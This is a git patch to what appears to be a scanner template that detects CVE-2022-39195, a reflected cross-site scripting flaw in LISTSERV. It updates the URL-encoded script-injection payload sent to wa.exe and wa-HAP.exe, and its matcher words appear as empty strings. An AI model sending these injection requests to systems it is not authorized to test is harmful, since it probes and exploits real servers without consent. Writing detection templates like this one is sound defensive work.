From b37212ce3cdced4d60d23c7fca6d45efad0bb403 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 23 Jan 2023 11:20:08 +0530 Subject: [PATCH] updated payload --- cves/2022/CVE-2022-39195.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/cves/2022/CVE-2022-39195.yaml b/cves/2022/CVE-2022-39195.yaml index 32e557875e..7475bf72b9 100644 --- a/cves/2022/CVE-2022-39195.yaml +++ b/cves/2022/CVE-2022-39195.yaml @@ -19,15 +19,15 @@ info: requests: - method: GET path: - - "{{BaseURL}}/scripts/wa.exe?TICKET=test&c=%3Cscript%3Ealert(1)%3C/script%3E" - - "{{BaseURL}}/scripts/wa-HAP.exe?TICKET=test&c=%3Cscript%3Ealert(1)%3C/script%3E" + - "{{BaseURL}}/scripts/wa.exe?TICKET=test&c=%3Cscript%3Ealert(document.domain)%3C/script%3E" + - "{{BaseURL}}/scripts/wa-HAP.exe?TICKET=test&c=%3Cscript%3Ealert(document.domain)%3C/script%3E" stop-at-first-match: true matchers-condition: and matchers: - type: word words: - - "" + - "" - "LISTSERV" condition: and case-insensitive: true